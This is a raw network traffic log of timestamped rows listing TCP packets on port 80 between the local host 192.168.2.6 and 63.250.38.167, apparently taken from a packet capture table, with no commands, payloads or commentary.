Oct 8, 2024 11:31:52.020768881 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020785093 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020800114 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020845890 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020895958 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020911932 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020925045 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:55.812304020 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:03.787374973 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:03.792272091 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:03.792557955 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:03.792558908 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:03.797456026 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402636051 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402657032 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402667999 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402681112 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402693033 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402704000 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402707100 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.402714014 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402725935 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402731895 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.402738094 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402751923 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.402789116 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.402790070 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.407994986 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.408005953 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.408018112 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.408104897 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.494906902 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.494946003 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.494957924 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.494965076 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.495004892 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.495035887 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.495049000 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.495089054 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.495316982 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.495362043 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.495376110 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.495414972 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.495444059 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.495455980 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.495476961 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.496273041 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.496294022 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.496304989 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.496323109 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.496350050 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.496360064 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.496362925 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.496422052 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.497045994 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.497064114 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.497076988 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.497096062 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.497100115 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.497108936 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.497159958 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.499828100 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.499840975 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.499852896 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.499875069 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.499882936 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.499922991 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.500109911 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.500148058 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.500236988 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.544362068 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.587338924 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587421894 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587434053 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587559938 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587572098 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587584019 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587595940 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587608099 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587619066 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587627888 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.587627888 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.587631941 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587641954 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587656021 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587658882 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.587733030 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.587862015 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587879896 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587896109 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587908030 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587929010 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587940931 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587950945 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587961912 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587973118 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.587979078 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.588017941 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.588157892 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.588500023 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588540077 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588551044 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588556051 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588639975 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.588671923 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588684082 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588695049 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588706017 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588721991 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588732004 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588736057 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.588742971 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588753939 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.588772058 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.588814020 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.589350939 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.589370966 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.589381933 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.589427948 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.589440107 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.589452028 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.589463949 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.589489937 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.589489937 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.592264891 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.592277050 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.592287064 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.592298031 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.592324018 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.592364073 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.592375994 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.592386007 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.592396975 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.592406988 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.592430115 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.592514038 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.883850098 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.883868933 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.883878946 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.883908033 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884143114 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884155989 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884170055 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884202003 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884207010 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884207010 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884212971 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884223938 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884233952 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884244919 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884254932 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884268045 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884311914 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884322882 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884332895 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884345055 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884356976 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884371042 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884381056 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884381056 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884381056 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884381056 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884381056 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884387016 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884418011 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884418011 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884479046 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884510994 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884522915 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884527922 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884540081 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884555101 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884566069 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884572983 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884577990 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884583950 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884594917 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884604931 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884623051 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884628057 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884628057 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884628057 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884634018 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884644985 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884655952 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884668112 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884677887 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884680033 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884680033 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884687901 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884707928 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884711981 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884721041 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884732008 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884746075 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884748936 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884749889 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884757042 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884768009 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884778023 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884788990 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884799004 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884809971 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884820938 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884830952 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884843111 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884855986 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884866953 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884877920 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884896040 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884912968 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884924889 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884933949 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884933949 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884933949 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884933949 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884933949 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884933949 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884936094 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884948015 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884959936 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884959936 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.884962082 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884973049 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.884977102 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.885008097 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885019064 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885021925 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.885030031 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885041952 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885051012 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.885066986 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.885190964 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885201931 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885210991 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885222912 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885237932 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885332108 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.885370970 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.885370970 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.885370970 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.885577917 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891232967 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891252041 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891262054 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891355991 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891366959 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891376972 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891396046 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891402960 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891402960 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891402960 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891417980 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891428947 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891438961 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891450882 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891455889 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891463041 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891511917 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891511917 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891587973 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891599894 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891608953 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891619921 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891630888 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891640902 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891650915 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891660929 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891774893 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891788006 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891808987 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891820908 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891832113 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891849041 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891913891 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891921997 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891921997 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891921997 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891921997 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891926050 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891937017 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891948938 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891949892 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.891968012 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891978979 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891990900 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.891997099 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.892002106 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892015934 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892051935 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.892088890 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.892338037 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892577887 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892590046 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892600060 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892611027 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892627954 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892642021 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892653942 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892664909 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892676115 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892680883 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.892680883 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.892688036 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892699003 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892709017 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892719984 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892730951 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.892746925 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.892786026 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.892786026 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.892843008 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.893349886 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893455029 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893466949 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893477917 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893487930 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893498898 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893512011 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893573046 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893584967 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893589020 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.893589020 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.893589020 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.893596888 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893609047 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893621922 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893632889 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893644094 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893649101 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.893649101 CEST	50002	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:04.893659115 CEST	80	50002	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:04.893676043 CEST	50002	80	192.168.2.6	63.250.38.167
